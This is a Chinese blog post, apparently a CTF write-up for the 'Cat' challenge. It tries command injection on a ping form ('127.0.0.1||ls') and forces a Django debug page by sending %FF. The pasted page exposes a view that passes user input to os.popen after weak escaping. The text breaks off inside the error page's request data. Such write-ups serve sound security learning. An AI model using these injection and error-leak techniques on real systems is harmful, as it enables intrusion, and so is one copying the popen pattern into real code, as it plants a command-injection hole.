攻防世界-Cat

已于 2023-01-18 10:29:32 修改
阅读量1.1k 收藏 1
点赞数 1
分类专栏: CTF 文章标签: css 前端 css3
于 2023-01-18 10:25:09 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_49025459/article/details/128723290
版权

题目 

访问题目场景

 输入IP:127.0.0.1,发现可是个ping命令

我没猜错,这个输入可能存在命令执行的操作,但是经过尝试之后,我们发现,并不能正常执行,所以猜错存在过滤

127.0.0.1||ls

 

 我们在看url的时候发现他的url处存在编码,url编码我们进行尝试,URL编码中ascii字符的边界是%7F,fuzz发现当url=%FF时报错,然后产生了一串巨长的代码,那我们只能代码审计了。


<!DOCTYPE html>
<html lang="en">
<head>
  <meta http-equiv="content-type" content="text/html; charset=utf-8">
  <meta name="robots" content="NONE,NOARCHIVE">
  <title>UnicodeEncodeError at /api/ping</title>
  <style type="text/css">
    html * { padding:0; margin:0; }
    body * { padding:10px 20px; }
    body * * { padding:0; }
    body { font:small sans-serif; }
    body>div { border-bottom:1px solid #ddd; }
    h1 { font-weight:normal; }
    h2 { margin-bottom:.8em; }
    h2 span { font-size:80%; color:#666; font-weight:normal; }
    h3 { margin:1em 0 .5em 0; }
    h4 { margin:0 0 .5em 0; font-weight: normal; }
    code, pre { font-size: 100%; white-space: pre-wrap; }
    table { border:1px solid #ccc; border-collapse: collapse; width:100%; background:white; }
    tbody td, tbody th { vertical-align:top; padding:2px 3px; }
    thead th {
      padding:1px 6px 1px 3px; background:#fefefe; text-align:left;
      font-weight:normal; font-size:11px; border:1px solid #ddd;
    }
    tbody th { width:12em; text-align:right; color:#666; padding-right:.5em; }
    table.vars { margin:5px 0 2px 40px; }
    table.vars td, table.req td { font-family:monospace; }
    table td.code { width:100%; }
    table td.code pre { overflow:hidden; }
    table.source th { color:#666; }
    table.source td { font-family:monospace; white-space:pre; border-bottom:1px solid #eee; }
    ul.traceback { list-style-type:none; color: #222; }
    ul.traceback li.frame { padding-bottom:1em; color:#666; }
    ul.traceback li.user { background-color:#e0e0e0; color:#000 }
    div.context { padding:10px 0; overflow:hidden; }
    div.context ol { padding-left:30px; margin:0 10px; list-style-position: inside; }
    div.context ol li { font-family:monospace; white-space:pre; color:#777; cursor:pointer; padding-left: 2px; }
    div.context ol li pre { display:inline; }
    div.context ol.context-line li { color:#505050; background-color:#dfdfdf; padding: 3px 2px; }
    div.context ol.context-line li span { position:absolute; right:32px; }
    .user div.context ol.context-line li { background-color:#bbb; color:#000; }
    .user div.context ol li { color:#666; }
    div.commands { margin-left: 40px; }
    div.commands a { color:#555; text-decoration:none; }
    .user div.commands a { color: black; }
    #summary { background: #ffc; }
    #summary h2 { font-weight: normal; color: #666; }
    #explanation { background:#eee; }
    #template, #template-not-exist { background:#f6f6f6; }
    #template-not-exist ul { margin: 0 0 10px 20px; }
    #template-not-exist .postmortem-section { margin-bottom: 3px; }
    #unicode-hint { background:#eee; }
    #traceback { background:#eee; }
    #requestinfo { background:#f6f6f6; padding-left:120px; }
    #summary table { border:none; background:transparent; }
    #requestinfo h2, #requestinfo h3 { position:relative; margin-left:-100px; }
    #requestinfo h3 { margin-bottom:-1em; }
    .error { background: #ffc; }
    .specific { color:#cc3300; font-weight:bold; }
    h2 span.commands { font-size:.7em;}
    span.commands a:link {color:#5E5694;}
    pre.exception_value { font-family: sans-serif; color: #666; font-size: 1.5em; margin: 10px 0 10px 0; }
    .append-bottom { margin-bottom: 10px; }
  </style>
  
  <script type="text/javascript">
  //<!--
    function getElementsByClassName(oElm, strTagName, strClassName){
        // Written by Jonathan Snook, http://www.snook.ca/jon; Add-ons by Robert Nyman, http://www.robertnyman.com
        var arrElements = (strTagName == "*" && document.all)? document.all :
        oElm.getElementsByTagName(strTagName);
        var arrReturnElements = new Array();
        strClassName = strClassName.replace(/\-/g, "\-");
        var oRegExp = new RegExp("(^|\s)" + strClassName + "(\s|$)");
        var oElement;
        for(var i=0; i<arrElements.length; i++){
            oElement = arrElements[i];
            if(oRegExp.test(oElement.className)){
                arrReturnElements.push(oElement);
            }
        }
        return (arrReturnElements)
    }
    function hideAll(elems) {
      for (var e = 0; e < elems.length; e++) {
        elems[e].style.display = 'none';
      }
    }
    window.onload = function() {
      hideAll(getElementsByClassName(document, 'table', 'vars'));
      hideAll(getElementsByClassName(document, 'ol', 'pre-context'));
      hideAll(getElementsByClassName(document, 'ol', 'post-context'));
      hideAll(getElementsByClassName(document, 'div', 'pastebin'));
    }
    function toggle() {
      for (var i = 0; i < arguments.length; i++) {
        var e = document.getElementById(arguments[i]);
        if (e) {
          e.style.display = e.style.display == 'none' ? 'block': 'none';
        }
      }
      return false;
    }
    function varToggle(link, id) {
      toggle('v' + id);
      var s = link.getElementsByTagName('span')[0];
      var uarr = String.fromCharCode(0x25b6);
      var darr = String.fromCharCode(0x25bc);
      s.textContent = s.textContent == uarr ? darr : uarr;
      return false;
    }
    function switchPastebinFriendly(link) {
      s1 = "Switch to copy-and-paste view";
      s2 = "Switch back to interactive view";
      link.textContent = link.textContent.trim() == s1 ? s2: s1;
      toggle('browserTraceback', 'pastebinTraceback');
      return false;
    }
    //-->
  </script>
  
</head>
<body>
<div id="summary">
  <h1>UnicodeEncodeError at /api/ping</h1>
  <pre class="exception_value">&#39;gbk&#39; codec can&#39;t encode character u&#39;\ufffd&#39; in position 0: illegal multibyte sequence</pre>
  <table class="meta">

    <tr>
      <th>Request Method:</th>
      <td>POST</td>
    </tr>
    <tr>
      <th>Request URL:</th>
      <td>http://127.0.0.1:8000/api/ping</td>
    </tr>

    <tr>
      <th>Django Version:</th>
      <td>1.10.4</td>
    </tr>

    <tr>
      <th>Exception Type:</th>
      <td>UnicodeEncodeError</td>
    </tr>


    <tr>
      <th>Exception Value:</th>
      <td><pre>&#39;gbk&#39; codec can&#39;t encode character u&#39;\ufffd&#39; in position 0: illegal multibyte sequence</pre></td>
    </tr>


    <tr>
      <th>Exception Location:</th>
      <td>/opt/api/dnsapi/utils.py in escape, line 9</td>
    </tr>

    <tr>
      <th>Python Executable:</th>
      <td>/usr/bin/python</td>
    </tr>
    <tr>
      <th>Python Version:</th>
      <td>2.7.12</td>
    </tr>
    <tr>
      <th>Python Path:</th>
      <td><pre>[&#39;/opt/api&#39;,
 &#39;/usr/lib/python2.7&#39;,
 &#39;/usr/lib/python2.7/plat-x86_64-linux-gnu&#39;,
 &#39;/usr/lib/python2.7/lib-tk&#39;,
 &#39;/usr/lib/python2.7/lib-old&#39;,
 &#39;/usr/lib/python2.7/lib-dynload&#39;,
 &#39;/usr/local/lib/python2.7/dist-packages&#39;,
 &#39;/usr/lib/python2.7/dist-packages&#39;]</pre></td>
    </tr>
    <tr>
      <th>Server time:</th>
      <td>Wed, 18 Jan 2023 02:04:16 +0000</td>
    </tr>
  </table>
</div>

<div id="unicode-hint">
    <h2>Unicode error hint</h2>
    <p>The string that could not be encoded/decoded was: <strong>�</strong></p>
</div>




<div id="traceback">
  <h2>Traceback <span class="commands"><a href="#" onclick="return switchPastebinFriendly(this);">
    Switch to copy-and-paste view</a></span>
  </h2>
  
  <div id="browserTraceback">
    <ul class="traceback">
      
        
        <li class="frame django">
          <code>/usr/local/lib/python2.7/dist-packages/django/core/handlers/exception.py</code> in <code>inner</code>

          
            <div class="context" id="c140460418746128">
              
                <ol start="32" class="pre-context" id="pre140460418746128">
                
                  <li onclick="toggle('pre140460418746128', 'post140460418746128')"><pre>    This decorator is automatically applied to all middleware to ensure that</pre></li>
                
                  <li onclick="toggle('pre140460418746128', 'post140460418746128')"><pre>    no middleware leaks an exception and that the next middleware in the stack</pre></li>
                
                  <li onclick="toggle('pre140460418746128', 'post140460418746128')"><pre>    can rely on getting a response instead of an exception.</pre></li>
                
                  <li onclick="toggle('pre140460418746128', 'post140460418746128')"><pre>    &quot;&quot;&quot;</pre></li>
                
                  <li onclick="toggle('pre140460418746128', 'post140460418746128')"><pre>    @wraps(get_response, assigned=available_attrs(get_response))</pre></li>
                
                  <li onclick="toggle('pre140460418746128', 'post140460418746128')"><pre>    def inner(request):</pre></li>
                
                  <li onclick="toggle('pre140460418746128', 'post140460418746128')"><pre>        try:</pre></li>
                
                </ol>
              
              <ol start="39" class="context-line">
                <li onclick="toggle('pre140460418746128', 'post140460418746128')"><pre>
            response = get_response(request)</pre> <span>...</span></li></ol>
              
                <ol start='40' class="post-context" id="post140460418746128">
                  
                  <li onclick="toggle('pre140460418746128', 'post140460418746128')"><pre>        except Exception as exc:</pre></li>
                  
                  <li onclick="toggle('pre140460418746128', 'post140460418746128')"><pre>            response = response_for_exception(request, exc)</pre></li>
                  
                  <li onclick="toggle('pre140460418746128', 'post140460418746128')"><pre>        return response</pre></li>
                  
                  <li onclick="toggle('pre140460418746128', 'post140460418746128')"><pre>    return inner</pre></li>
                  
                  <li onclick="toggle('pre140460418746128', 'post140460418746128')"><pre></pre></li>
                  
                  <li onclick="toggle('pre140460418746128', 'post140460418746128')"><pre></pre></li>
                  
              </ol>
              
            </div>
          

          
            <div class="commands">
                
                    <a href="#" onclick="return varToggle(this, '140460418746128')"><span>&#x25b6;</span> Local vars</a>
                
            </div>
            <table class="vars" id="v140460418746128">
              <thead>
                <tr>
                  <th>Variable</th>
                  <th>Value</th>
                </tr>
              </thead>
              <tbody>
                
                  <tr>
                    <td>exc</td>
                    <td class="code"><pre>UnicodeEncodeError(&#39;gbk&#39;, u&#39;\ufffd&#39;, 0, 1, &#39;illegal multibyte sequence&#39;)</pre></td>
                  </tr>
                
                  <tr>
                    <td>get_response</td>
                    <td class="code"><pre>&lt;bound method WSGIHandler._get_response of &lt;django.core.handlers.wsgi.WSGIHandler object at 0x7fbf7e66eb10&gt;&gt;</pre></td>
                  </tr>
                
                  <tr>
                    <td>request</td>
                    <td class="code"><pre>&lt;WSGIRequest: POST &#39;/api/ping&#39;&gt;</pre></td>
                  </tr>
                
              </tbody>
            </table>
          
        </li>
      
        
        <li class="frame django">
          <code>/usr/local/lib/python2.7/dist-packages/django/core/handlers/base.py</code> in <code>_get_response</code>

          
            <div class="context" id="c140460419311880">
              
                <ol start="180" class="pre-context" id="pre140460419311880">
                
                  <li onclick="toggle('pre140460419311880', 'post140460419311880')"><pre>                break</pre></li>
                
                  <li onclick="toggle('pre140460419311880', 'post140460419311880')"><pre></pre></li>
                
                  <li onclick="toggle('pre140460419311880', 'post140460419311880')"><pre>        if response is None:</pre></li>
                
                  <li onclick="toggle('pre140460419311880', 'post140460419311880')"><pre>            wrapped_callback = self.make_view_atomic(callback)</pre></li>
                
                  <li onclick="toggle('pre140460419311880', 'post140460419311880')"><pre>            try:</pre></li>
                
                  <li onclick="toggle('pre140460419311880', 'post140460419311880')"><pre>                response = wrapped_callback(request, *callback_args, **callback_kwargs)</pre></li>
                
                  <li onclick="toggle('pre140460419311880', 'post140460419311880')"><pre>            except Exception as e:</pre></li>
                
                </ol>
              
              <ol start="187" class="context-line">
                <li onclick="toggle('pre140460419311880', 'post140460419311880')"><pre>
                response = self.process_exception_by_middleware(e, request)</pre> <span>...</span></li></ol>
              
                <ol start='188' class="post-context" id="post140460419311880">
                  
                  <li onclick="toggle('pre140460419311880', 'post140460419311880')"><pre></pre></li>
                  
                  <li onclick="toggle('pre140460419311880', 'post140460419311880')"><pre>        # Complain if the view returned None (a common error).</pre></li>
                  
                  <li onclick="toggle('pre140460419311880', 'post140460419311880')"><pre>        if response is None:</pre></li>
                  
                  <li onclick="toggle('pre140460419311880', 'post140460419311880')"><pre>            if isinstance(callback, types.FunctionType):    # FBV</pre></li>
                  
                  <li onclick="toggle('pre140460419311880', 'post140460419311880')"><pre>                view_name = callback.__name__</pre></li>
                  
                  <li onclick="toggle('pre140460419311880', 'post140460419311880')"><pre>            else:                                           # CBV</pre></li>
                  
              </ol>
              
            </div>
          

          
            <div class="commands">
                
                    <a href="#" onclick="return varToggle(this, '140460419311880')"><span>&#x25b6;</span> Local vars</a>
                
            </div>
            <table class="vars" id="v140460419311880">
              <thead>
                <tr>
                  <th>Variable</th>
                  <th>Value</th>
                </tr>
              </thead>
              <tbody>
                
                  <tr>
                    <td>callback</td>
                    <td class="code"><pre>&lt;function ping at 0x7fbf7d677d70&gt;</pre></td>
                  </tr>
                
                  <tr>
                    <td>callback_args</td>
                    <td class="code"><pre>()</pre></td>
                  </tr>
                
                  <tr>
                    <td>callback_kwargs</td>
                    <td class="code"><pre>{}</pre></td>
                  </tr>
                
                  <tr>
                    <td>e</td>
                    <td class="code"><pre>UnicodeEncodeError(&#39;gbk&#39;, u&#39;\ufffd&#39;, 0, 1, &#39;illegal multibyte sequence&#39;)</pre></td>
                  </tr>
                
                  <tr>
                    <td>request</td>
                    <td class="code"><pre>&lt;WSGIRequest: POST &#39;/api/ping&#39;&gt;</pre></td>
                  </tr>
                
                  <tr>
                    <td>resolver</td>
                    <td class="code"><pre>&lt;RegexURLResolver &#39;api.urls&#39; (None:None) ^/&gt;</pre></td>
                  </tr>
                
                  <tr>
                    <td>resolver_match</td>
                    <td class="code"><pre>ResolverMatch(func=dnsapi.views.ping, args=(), kwargs={}, url_name=None, app_names=[], namespaces=[])</pre></td>
                  </tr>
                
                  <tr>
                    <td>response</td>
                    <td class="code"><pre>None</pre></td>
                  </tr>
                
                  <tr>
                    <td>self</td>
                    <td class="code"><pre>&lt;django.core.handlers.wsgi.WSGIHandler object at 0x7fbf7e66eb10&gt;</pre></td>
                  </tr>
                
                  <tr>
                    <td>wrapped_callback</td>
                    <td class="code"><pre>&lt;function ping at 0x7fbf7d677d70&gt;</pre></td>
                  </tr>
                
              </tbody>
            </table>
          
        </li>
      
        
        <li class="frame django">
          <code>/usr/local/lib/python2.7/dist-packages/django/core/handlers/base.py</code> in <code>_get_response</code>

          
            <div class="context" id="c140460402700232">
              
                <ol start="178" class="pre-context" id="pre140460402700232">
                
                  <li onclick="toggle('pre140460402700232', 'post140460402700232')"><pre>            response = middleware_method(request, callback, callback_args, callback_kwargs)</pre></li>
                
                  <li onclick="toggle('pre140460402700232', 'post140460402700232')"><pre>            if response:</pre></li>
                
                  <li onclick="toggle('pre140460402700232', 'post140460402700232')"><pre>                break</pre></li>
                
                  <li onclick="toggle('pre140460402700232', 'post140460402700232')"><pre></pre></li>
                
                  <li onclick="toggle('pre140460402700232', 'post140460402700232')"><pre>        if response is None:</pre></li>
                
                  <li onclick="toggle('pre140460402700232', 'post140460402700232')"><pre>            wrapped_callback = self.make_view_atomic(callback)</pre></li>
                
                  <li onclick="toggle('pre140460402700232', 'post140460402700232')"><pre>            try:</pre></li>
                
                </ol>
              
              <ol start="185" class="context-line">
                <li onclick="toggle('pre140460402700232', 'post140460402700232')"><pre>
                response = wrapped_callback(request, *callback_args, **callback_kwargs)</pre> <span>...</span></li></ol>
              
                <ol start='186' class="post-context" id="post140460402700232">
                  
                  <li onclick="toggle('pre140460402700232', 'post140460402700232')"><pre>            except Exception as e:</pre></li>
                  
                  <li onclick="toggle('pre140460402700232', 'post140460402700232')"><pre>                response = self.process_exception_by_middleware(e, request)</pre></li>
                  
                  <li onclick="toggle('pre140460402700232', 'post140460402700232')"><pre></pre></li>
                  
                  <li onclick="toggle('pre140460402700232', 'post140460402700232')"><pre>        # Complain if the view returned None (a common error).</pre></li>
                  
                  <li onclick="toggle('pre140460402700232', 'post140460402700232')"><pre>        if response is None:</pre></li>
                  
                  <li onclick="toggle('pre140460402700232', 'post140460402700232')"><pre>            if isinstance(callback, types.FunctionType):    # FBV</pre></li>
                  
              </ol>
              
            </div>
          

          
            <div class="commands">
                
                    <a href="#" onclick="return varToggle(this, '140460402700232')"><span>&#x25b6;</span> Local vars</a>
                
            </div>
            <table class="vars" id="v140460402700232">
              <thead>
                <tr>
                  <th>Variable</th>
                  <th>Value</th>
                </tr>
              </thead>
              <tbody>
                
                  <tr>
                    <td>callback</td>
                    <td class="code"><pre>&lt;function ping at 0x7fbf7d677d70&gt;</pre></td>
                  </tr>
                
                  <tr>
                    <td>callback_args</td>
                    <td class="code"><pre>()</pre></td>
                  </tr>
                
                  <tr>
                    <td>callback_kwargs</td>
                    <td class="code"><pre>{}</pre></td>
                  </tr>
                
                  <tr>
                    <td>e</td>
                    <td class="code"><pre>UnicodeEncodeError(&#39;gbk&#39;, u&#39;\ufffd&#39;, 0, 1, &#39;illegal multibyte sequence&#39;)</pre></td>
                  </tr>
                
                  <tr>
                    <td>request</td>
                    <td class="code"><pre>&lt;WSGIRequest: POST &#39;/api/ping&#39;&gt;</pre></td>
                  </tr>
                
                  <tr>
                    <td>resolver</td>
                    <td class="code"><pre>&lt;RegexURLResolver &#39;api.urls&#39; (None:None) ^/&gt;</pre></td>
                  </tr>
                
                  <tr>
                    <td>resolver_match</td>
                    <td class="code"><pre>ResolverMatch(func=dnsapi.views.ping, args=(), kwargs={}, url_name=None, app_names=[], namespaces=[])</pre></td>
                  </tr>
                
                  <tr>
                    <td>response</td>
                    <td class="code"><pre>None</pre></td>
                  </tr>
                
                  <tr>
                    <td>self</td>
                    <td class="code"><pre>&lt;django.core.handlers.wsgi.WSGIHandler object at 0x7fbf7e66eb10&gt;</pre></td>
                  </tr>
                
                  <tr>
                    <td>wrapped_callback</td>
                    <td class="code"><pre>&lt;function ping at 0x7fbf7d677d70&gt;</pre></td>
                  </tr>
                
              </tbody>
            </table>
          
        </li>
      
        
        <li class="frame user">
          <code>/opt/api/dnsapi/views.py</code> in <code>wrapper</code>

          
            <div class="context" id="c140460402699440">
              
                <ol start="14" class="pre-context" id="pre140460402699440">
                
                  <li onclick="toggle('pre140460402699440', 'post140460402699440')"><pre>        # 合并 requests.FILES 和 requests.POST</pre></li>
                
                  <li onclick="toggle('pre140460402699440', 'post140460402699440')"><pre>        for k, v in request.FILES.items():</pre></li>
                
                  <li onclick="toggle('pre140460402699440', 'post140460402699440')"><pre>            if isinstance(v, InMemoryUploadedFile):</pre></li>
                
                  <li onclick="toggle('pre140460402699440', 'post140460402699440')"><pre>                v = v.read()</pre></li>
                
                  <li onclick="toggle('pre140460402699440', 'post140460402699440')"><pre>            request.FILES[k] = v</pre></li>
                
                  <li onclick="toggle('pre140460402699440', 'post140460402699440')"><pre></pre></li>
                
                  <li onclick="toggle('pre140460402699440', 'post140460402699440')"><pre>        request.POST.update(request.FILES)</pre></li>
                
                </ol>
              
              <ol start="21" class="context-line">
                <li onclick="toggle('pre140460402699440', 'post140460402699440')"><pre>
        return f(*args, **kwargs)</pre> <span>...</span></li></ol>
              
                <ol start='22' class="post-context" id="post140460402699440">
                  
                  <li onclick="toggle('pre140460402699440', 'post140460402699440')"><pre></pre></li>
                  
                  <li onclick="toggle('pre140460402699440', 'post140460402699440')"><pre>    return wrapper</pre></li>
                  
                  <li onclick="toggle('pre140460402699440', 'post140460402699440')"><pre></pre></li>
                  
                  <li onclick="toggle('pre140460402699440', 'post140460402699440')"><pre></pre></li>
                  
                  <li onclick="toggle('pre140460402699440', 'post140460402699440')"><pre>@process_request</pre></li>
                  
                  <li onclick="toggle('pre140460402699440', 'post140460402699440')"><pre>def ping(request):</pre></li>
                  
              </ol>
              
            </div>
          

          
            <div class="commands">
                
                    <a href="#" onclick="return varToggle(this, '140460402699440')"><span>&#x25b6;</span> Local vars</a>
                
            </div>
            <table class="vars" id="v140460402699440">
              <thead>
                <tr>
                  <th>Variable</th>
                  <th>Value</th>
                </tr>
              </thead>
              <tbody>
                
                  <tr>
                    <td>args</td>
                    <td class="code"><pre>(&lt;WSGIRequest: POST &#39;/api/ping&#39;&gt;,)</pre></td>
                  </tr>
                
                  <tr>
                    <td>f</td>
                    <td class="code"><pre>&lt;function ping at 0x7fbf7d677cf8&gt;</pre></td>
                  </tr>
                
                  <tr>
                    <td>kwargs</td>
                    <td class="code"><pre>{}</pre></td>
                  </tr>
                
                  <tr>
                    <td>request</td>
                    <td class="code"><pre>&lt;WSGIRequest: POST &#39;/api/ping&#39;&gt;</pre></td>
                  </tr>
                
              </tbody>
            </table>
          
        </li>
      
        
        <li class="frame user">
          <code>/opt/api/dnsapi/views.py</code> in <code>ping</code>

          
            <div class="context" id="c140460402697712">
              
                <ol start="23" class="pre-context" id="pre140460402697712">
                
                  <li onclick="toggle('pre140460402697712', 'post140460402697712')"><pre>    return wrapper</pre></li>
                
                  <li onclick="toggle('pre140460402697712', 'post140460402697712')"><pre></pre></li>
                
                  <li onclick="toggle('pre140460402697712', 'post140460402697712')"><pre></pre></li>
                
                  <li onclick="toggle('pre140460402697712', 'post140460402697712')"><pre>@process_request</pre></li>
                
                  <li onclick="toggle('pre140460402697712', 'post140460402697712')"><pre>def ping(request):</pre></li>
                
                  <li onclick="toggle('pre140460402697712', 'post140460402697712')"><pre>    # 转义</pre></li>
                
                  <li onclick="toggle('pre140460402697712', 'post140460402697712')"><pre>    data = request.POST.get(&#39;url&#39;)</pre></li>
                
                </ol>
              
              <ol start="30" class="context-line">
                <li onclick="toggle('pre140460402697712', 'post140460402697712')"><pre>
    data = escape(data)</pre> <span>...</span></li></ol>
              
                <ol start='31' class="post-context" id="post140460402697712">
                  
                  <li onclick="toggle('pre140460402697712', 'post140460402697712')"><pre>    if not re.match(&#39;^[a-zA-Z0-9\-\./]+$&#39;, data):</pre></li>
                  
                  <li onclick="toggle('pre140460402697712', 'post140460402697712')"><pre>        return HttpResponse(&quot;Invalid URL&quot;)</pre></li>
                  
                  <li onclick="toggle('pre140460402697712', 'post140460402697712')"><pre></pre></li>
                  
                  <li onclick="toggle('pre140460402697712', 'post140460402697712')"><pre>    return HttpResponse(os.popen(&quot;ping -c 1 \&quot;%s\&quot;&quot; % data).read())</pre></li>
                  
                  <li onclick="toggle('pre140460402697712', 'post140460402697712')"><pre></pre></li>
                  
              </ol>
              
            </div>
          

          
            <div class="commands">
                
                    <a href="#" onclick="return varToggle(this, '140460402697712')"><span>&#x25b6;</span> Local vars</a>
                
            </div>
            <table class="vars" id="v140460402697712">
              <thead>
                <tr>
                  <th>Variable</th>
                  <th>Value</th>
                </tr>
              </thead>
              <tbody>
                
                  <tr>
                    <td>data</td>
                    <td class="code"><pre>u&#39;\ufffd&#39;</pre></td>
                  </tr>
                
                  <tr>
                    <td>request</td>
                    <td class="code"><pre>&lt;WSGIRequest: POST &#39;/api/ping&#39;&gt;</pre></td>
                  </tr>
                
              </tbody>
            </table>
          
        </li>
      
        
        <li class="frame user">
          <code>/opt/api/dnsapi/utils.py</code> in <code>escape</code>

          
            <div class="context" id="c140460402698432">
              
                <ol start="2" class="pre-context" id="pre140460402698432">
                
                  <li onclick="toggle('pre140460402698432', 'post140460402698432')"><pre>    r = &#39;&#39;</pre></li>
                
                  <li onclick="toggle('pre140460402698432', 'post140460402698432')"><pre>    for i in range(len(data)):</pre></li>
                
                  <li onclick="toggle('pre140460402698432', 'post140460402698432')"><pre>        c = data[i]</pre></li>
                
                  <li onclick="toggle('pre140460402698432', 'post140460402698432')"><pre>        if c in (&#39;\\&#39;, &#39;\&#39;&#39;, &#39;&quot;&#39;, &#39;$&#39;, &#39;`&#39;):</pre></li>
                
                  <li onclick="toggle('pre140460402698432', 'post140460402698432')"><pre>            r = r + &#39;\\&#39; + c</pre></li>
                
                  <li onclick="toggle('pre140460402698432', 'post140460402698432')"><pre>        else:</pre></li>
                
                  <li onclick="toggle('pre140460402698432', 'post140460402698432')"><pre>            r = r + c</pre></li>
                
                </ol>
              
              <ol start="9" class="context-line">
                <li onclick="toggle('pre140460402698432', 'post140460402698432')"><pre>
    return r.encode(&#39;gbk&#39;)</pre> <span>...</span></li></ol>
              
            </div>
          

          
            <div class="commands">
                
                    <a href="#" onclick="return varToggle(this, '140460402698432')"><span>&#x25b6;</span> Local vars</a>
                
            </div>
            <table class="vars" id="v140460402698432">
              <thead>
                <tr>
                  <th>Variable</th>
                  <th>Value</th>
                </tr>
              </thead>
              <tbody>
                
                  <tr>
                    <td>c</td>
                    <td class="code"><pre>u&#39;\ufffd&#39;</pre></td>
                  </tr>
                
                  <tr>
                    <td>data</td>
                    <td class="code"><pre>u&#39;\ufffd&#39;</pre></td>
                  </tr>
                
                  <tr>
                    <td>i</td>
                    <td class="code"><pre>0</pre></td>
                  </tr>
                
                  <tr>
                    <td>r</td>
                    <td class="code"><pre>u&#39;\ufffd&#39;</pre></td>
                  </tr>
                
              </tbody>
            </table>
          
        </li>
      
    </ul>
  </div>
  
  <form action="http://dpaste.com/" name="pasteform" id="pasteform" method="post">

  <div id="pastebinTraceback" class="pastebin">
    <input type="hidden" name="language" value="PythonConsole">
    <input type="hidden" name="title"
      value="UnicodeEncodeError at /api/ping">
    <input type="hidden" name="source" value="Django Dpaste Agent">
    <input type="hidden" name="poster" value="Django">
    <textarea name="content" id="traceback_area" cols="140" rows="25">
Environment:


Request Method: POST
Request URL: http://127.0.0.1:8000/api/ping

Django Version: 1.10.4
Python Version: 2.7.12
Installed Applications:
[&#39;django.contrib.admin&#39;,
 &#39;django.contrib.auth&#39;,
 &#39;django.contrib.contenttypes&#39;,
 &#39;django.contrib.sessions&#39;,
 &#39;django.contrib.messages&#39;,
 &#39;django.contrib.staticfiles&#39;,
 &#39;dnsapi&#39;]
Installed Middleware:
[&#39;django.middleware.security.SecurityMiddleware&#39;,
 &#39;django.contrib.sessions.middleware.SessionMiddleware&#39;,
 &#39;django.middleware.common.CommonMiddleware&#39;,
 &#39;django.contrib.auth.middleware.AuthenticationMiddleware&#39;,
 &#39;django.contrib.messages.middleware.MessageMiddleware&#39;,
 &#39;django.middleware.clickjacking.XFrameOptionsMiddleware&#39;]



Traceback:

File "/usr/local/lib/python2.7/dist-packages/django/core/handlers/exception.py" in inner
  39.             response = get_response(request)

File "/usr/local/lib/python2.7/dist-packages/django/core/handlers/base.py" in _get_response
  187.                 response = self.process_exception_by_middleware(e, request)

File "/usr/local/lib/python2.7/dist-packages/django/core/handlers/base.py" in _get_response
  185.                 response = wrapped_callback(request, *callback_args, **callback_kwargs)

File "/opt/api/dnsapi/views.py" in wrapper
  21.         return f(*args, **kwargs)

File "/opt/api/dnsapi/views.py" in ping
  30.     data = escape(data)

File "/opt/api/dnsapi/utils.py" in escape
  9.     return r.encode(&#39;gbk&#39;)

Exception Type: UnicodeEncodeError at /api/ping
Exception Value: &#39;gbk&#39; codec can&#39;t encode character u&#39;\ufffd&#39; in position 0: illegal multibyte sequence
</textarea>
  <br><br>
  <input type="submit" value="Share this traceback on a public website">
  </div>
</form>
</div>



<div id="requestinfo">
  <h2>Request information</h2>


  
    <h3 id="user-info">USER</h3>
    <p>AnonymousUser</p>
  

  <h3 id="get-info">GET</h3>
  
    <p>No GET data</p>
  

  <h3 id="post-info">POST</h3>
  
    <table class="req">
      <thead>
        <tr>
          <th>Variable</th>
          <th>Value</th>
        </tr>
      </thead>
      <tbody>
        
          <tr>
            <td>url</td>
            <td class="code"><pre>u&#39;\ufffd&#39;</pre></td>
          </tr>
        
      </tbody>
    </table>
  
  <h3 id="files-info">FILES</h3>
  
    <p>No FILES data</p>
  


  <h3 id="cookie-info">COOKIES</h3>
  
    <p>No cookie data</p>
  

  <h3 id="meta-info">META</h3>
  <table class="req">
    <thead>
      <tr>
        <th>Variable</th>
        <th>Value</th>
      </tr>
    </thead>
    <tbody>
      
        <tr>
          <td>CONTENT_LENGTH</td>
          <td class="code"><pre>&#39;139&#39;</pre></td>
        </tr>
      
        <tr>
          <td>CONTENT_TYPE</td>
          <td class="code"><pre>&#39;multipart/form-data; boundary=------------------------a982227d489d71a9&#39;</pre></td>
        </tr>
      
        <tr>
          <td>DJANGO_SETTINGS_MODULE</td>
          <td class="code"><pre>&#39;api.settings&#39;</pre></td>
        </tr>
      
        <tr>
          <td>GATEWAY_INTERFACE</td>
          <td class="code"><pre>&#39;CGI/1.1&#39;</pre></td>
        </tr>
      
        <tr>
          <td>HOME</td>
          <td class="code"><pre>&#39;/root&#39;</pre></td>
        </tr>
      
        <tr>
          <td>HOSTNAME</td>
          <td class="code"><pre>&#39;f84b747e65c1&#39;</pre></td>
        </tr>
      
        <tr>
          <td>HTTP_ACCEPT</td>
          <td class="code"><pre>&#39;*/*&#39;</pre></td>
        </tr>
      
        <tr>
          <td>HTTP_EXPECT</td>
          <td class="code"><pre>&#39;100-continue&#39;</pre></td>
        </tr>
      
        <tr>
          <td>HTTP_HOST</td>
          <td class="code"><pre>&#39;127.0.0.1:8000&#39;</pre></td>
        </tr>
      
        <tr>
          <td>PATH</td>
          <td class="code"><pre>&#39;/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin&#39;</pre></td>
        </tr>
      
        <tr>
          <td>PATH_INFO</td>
          <td class="code"><pre>u&#39;/api/ping&#39;</pre></td>
        </tr>
      
        <tr>
          <td>PWD</td>
          <td class="code"><pre>&#39;/opt/api&#39;</pre></td>
        </tr>
      
        <tr>
          <td>QUERY_STRING</td>
          <td class="code"><pre>&#39;&#39;</pre></td>
        </tr>
      
        <tr>
          <td>REMOTE_ADDR</td>
          <td class="code"><pre>&#39;127.0.0.1&#39;</pre></td>
        </tr>
      
        <tr>
          <td>REMOTE_HOST</td>
          <td class="code"><pre>&#39;&#39;</pre></td>
        </tr>
      
        <tr>
          <td>REQUEST_METHOD</td>
          <td class="code"><pre>&#39;POST&#39;</pre></td>
        </tr>
      
        <tr>
          <td>RUN_MAIN</td>
          <td class="code"><pre>&#39;true&#39;</pre></td>
        </tr>
      
        <tr>
          <td>SCRIPT_NAME</td>
          <td class="code"><pre>u&#39;&#39;</pre></td>
        </tr>
      
        <tr>
          <td>SERVER_NAME</td>
          <td class="code"><pre>&#39;localhost&#39;</pre></td>
        </tr>
      
        <tr>
          <td>SERVER_PORT</td>
          <td class="code"><pre>&#39;8000&#39;</pre></td>
        </tr>
